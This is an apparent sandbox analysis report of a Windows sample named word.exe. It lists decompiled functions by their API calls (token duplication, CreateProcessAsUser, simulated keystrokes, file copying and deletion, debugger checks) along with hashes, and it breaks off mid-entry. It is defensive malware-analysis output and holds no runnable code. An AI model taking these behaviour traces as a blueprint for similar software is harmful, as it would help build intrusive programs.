                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wfsopen
                                                                    • String ID:
                                                                    • API String ID: 197181222-0
                                                                    • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                    • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                    • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                    • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                    APIs
                                                                    • __encode_pointer.LIBCMT ref: 004169E2
                                                                      • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                                                                      • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                                                                      • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Value$EncodePointer__encode_pointer
                                                                    • String ID:
                                                                    • API String ID: 2585649348-0
                                                                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                    • Instruction ID: f62f3284a010ca3bbb159d13ec07db3ba5ef3bb17cb580217ffea2be35a92f46
                                                                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040D91D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                    • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                    • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                    • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 03514491
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466356869.0000000003512000.00000040.00000020.00020000.00000000.sdmp, Offset: 03512000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3512000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: b49de9676f084d1c46668cc9f33807e968c8ff265aa097587910543abf9a011c
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: 72E09A7494010DAFDB00EFA8D54969E7BB4EF04311F1045A1FD0696690DA709A649A66
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 03514491
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466356869.0000000003512000.00000040.00000020.00020000.00000000.sdmp, Offset: 03512000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3512000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: e566aa19a230e5eabac93b4a92f3a0adacc53a2f1ca5d55685f21b4ef8d1d9da
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 1AE0E67494010DDFDB00EFF8D54969E7FB4FF04301F1041A1FD02D2280D6709D609A62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                    • API String ID: 0-4260964411
                                                                    • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                    • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                    • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                    • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                    • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                    • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                    • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                    • SendMessageW.USER32 ref: 0047C2FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$State$LongProcWindow
                                                                    • String ID: @GUI_DRAGID$@1$F$X1
                                                                    • API String ID: 1562745308-3565284806
                                                                    • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                    • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                    • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                    • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 004375B3
                                                                    • FindWindowW.USER32 ref: 004375D8
                                                                    • IsIconic.USER32(?), ref: 004375E1
                                                                    • ShowWindow.USER32(?,00000009), ref: 004375EE
                                                                    • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                    • GetCurrentThreadId.KERNEL32(?,?,004448AF,?), ref: 00437619
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437632
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437638
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043763E
                                                                    • SetForegroundWindow.USER32(?), ref: 00437645
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                    • keybd_event.USER32 ref: 0043765D
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                    • keybd_event.USER32 ref: 00437674
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                    • keybd_event.USER32 ref: 0043768B
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                    • keybd_event.USER32 ref: 004376A2
                                                                    • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376CD
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D3
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 3778422247-2988720461
                                                                    • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                    • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                    • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                    • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0044621B
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                    • CloseHandle.KERNEL32(?), ref: 0044628A
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                    • GetProcessWindowStation.USER32 ref: 004462BD
                                                                    • SetProcessWindowStation.USER32 ref: 004462C8
                                                                    • OpenDesktopW.USER32 ref: 004462E4
                                                                    • _wcslen.LIBCMT ref: 0044639E
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    • _wcsncpy.LIBCMT ref: 004463C7
                                                                    • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                    • CreateProcessAsUserW.ADVAPI32 ref: 00446446
                                                                    • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                    • CloseWindowStation.USER32(00000000), ref: 00446497
                                                                    • CloseDesktop.USER32 ref: 0044649E
                                                                    • SetProcessWindowStation.USER32 ref: 004464A9
                                                                    • CloseHandle.KERNEL32(?), ref: 004464B4
                                                                    • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2173856841-1027155976
                                                                    • Opcode ID: 4e323acb5560963aebef2511b9a5fbe504709898213dfa3e9f50b58f3613fa55
                                                                    • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                    • Opcode Fuzzy Hash: 4e323acb5560963aebef2511b9a5fbe504709898213dfa3e9f50b58f3613fa55
                                                                    • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00409A61
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                    • String ID: 0vH$4RH
                                                                    • API String ID: 1143807570-2085553193
                                                                    • Opcode ID: 56588665ce10cf36c2065b5677d97fb3932d27035043a40030c9d97fd94435ba
                                                                    • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                    • Opcode Fuzzy Hash: 56588665ce10cf36c2065b5677d97fb3932d27035043a40030c9d97fd94435ba
                                                                    • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                    APIs
                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                      • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                      • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                      • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                    • _wcscat.LIBCMT ref: 0044BD96
                                                                    • _wcscat.LIBCMT ref: 0044BDBF
                                                                    • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                    • _wcscpy.LIBCMT ref: 0044BE73
                                                                    • _wcscat.LIBCMT ref: 0044BE85
                                                                    • _wcscat.LIBCMT ref: 0044BE97
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                    • MoveFileW.KERNEL32 ref: 0044BEF5
                                                                    • CopyFileW.KERNEL32 ref: 0044BF0C
                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                    • CopyFileW.KERNEL32 ref: 0044BF2E
                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                    • MoveFileW.KERNEL32 ref: 0044BF51
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 2188072990-1173974218
                                                                    • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                    • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                    • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                    • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                    APIs
                                                                    • __invoke_watson.LIBCMT ref: 004203A4
                                                                      • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                      • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                      • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32 ref: 00417E79
                                                                      • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?), ref: 00417E86
                                                                      • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                      • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                    • __get_daylight.LIBCMT ref: 004203B0
                                                                    • __invoke_watson.LIBCMT ref: 004203BF
                                                                    • __get_daylight.LIBCMT ref: 004203CB
                                                                    • __invoke_watson.LIBCMT ref: 004203DA
                                                                    • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                    • _strlen.LIBCMT ref: 00420442
                                                                    • __malloc_crt.LIBCMT ref: 00420449
                                                                    • _strlen.LIBCMT ref: 0042045F
                                                                    • _strcpy_s.LIBCMT ref: 0042046D
                                                                    • __invoke_watson.LIBCMT ref: 00420482
                                                                    • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                    • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                    • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                      • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                      • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                      • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                      • Part of subcall function 00413A88: HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
                                                                      • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                    • __invoke_watson.LIBCMT ref: 004205CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                    • String ID: S\
                                                                    • API String ID: 4084823496-393906132
                                                                    • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                    • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                    • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                    • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                    • __swprintf.LIBCMT ref: 00434D91
                                                                    • _wcslen.LIBCMT ref: 00434D9B
                                                                    • _wcslen.LIBCMT ref: 00434DB0
                                                                    • _wcslen.LIBCMT ref: 00434DC5
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                    • _memset.LIBCMT ref: 00434E27
                                                                    • _wcslen.LIBCMT ref: 00434E3C
                                                                    • _wcsncpy.LIBCMT ref: 00434E6F
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 302090198-3457252023
                                                                    • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                    • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                    • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                    • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                    APIs
                                                                      • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                    • GetLastError.KERNEL32 ref: 004644B4
                                                                    • GetCurrentThread.KERNEL32(00000028,00000000,?), ref: 004644C8
                                                                    • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
